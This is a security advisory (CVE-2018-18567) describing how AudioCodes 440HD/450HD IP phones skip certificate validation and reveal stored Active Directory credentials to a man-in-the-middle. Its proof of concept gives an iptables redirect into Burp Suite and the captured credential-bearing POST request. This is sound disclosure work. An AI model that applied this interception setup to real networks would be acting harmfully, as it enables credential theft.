AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle Vulnerability

🗓️ 25 Oct 2018 00:00:00Reported by Micha BorrmannType

zdt🔗 0day.today👁 99 Views

AudioCodes 440HD/450HD IP Phone 3.1.2.89 Man-In-The-Middle Vulnerability, Credentials Compromis

Reporter	Title	Published	Views	Family All 6
CVE	CVE-2018-18567	24 Oct 201822:00	–	cve
Cvelist	CVE-2018-18567	24 Oct 201822:00	–	cvelist
EUVD	EUVD-2018-10287	7 Oct 202500:30	–	euvd
NVD	CVE-2018-18567	24 Oct 201822:29	–	nvd
Packet Storm	AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle	24 Oct 201800:00	–	packetstorm
Prion	Design/Logic Flaw	24 Oct 201822:29	–	prion

AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle Vulnerability

Product:                   440HD / 450HD IP Phone
Manufacturer:              AudioCodes
Affected Version(s):       <= 3.1.2.89
Tested Version(s):         VC_3.1.1.43.1, VC_3.1.2.89
Vulnerability Type:        X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:        CVE-2018-18567
Author of Advisory:        Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a AudioCodes 440HD/450HD IP Phone [1] is used with an on-premise
installation with Skype for Business, the phone has stored credentials
of an account in the active directory. Performing a man-in-the-middle
attack, the phone give away the credentials to an attacker and
therefore the account will be compromised. The phone itself is fully
functional and will not show any hints of an attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials to a website usually named
skypewebpool via HTTPS but does not validate the X.509 certificate.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Configure Burp Suite as invisible proxy an gain a Man-in-the-Middle-position.

Set an iptables rule, that routes the traffic through Burp Suite, like

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.100 -p tcp --dport 443 -j REDIRECT --to-port 8080

Watch the proxy history for a HTTP POST request like

POST /WebTicket/oauthtoken HTTP/1.1
Host: skypewebpool.example.com
User-Agent: AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
Connection: close

grant_type=password&client_id=abc...&resource=https%3a%2f%2fskypewebpool.example.com&password=verytopsecretpassword&username=ADaccountname

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which has a trust store integrated and a
strict X.509 certificate validation policy, too.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-09-06: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://www.audiocodes.com/solutions-products/products/ip-phones/440hd-ip-phone
    https://www.audiocodes.com/solutions-products/products/ip-phones/450hd-ip-phone
[2] SySS Security Advisory SYSS-2018-026
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-026.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2018-10-25]  #

25 Oct 2018 00:00Current

6Medium risk

Vulners AI Score6

EPSS0.00659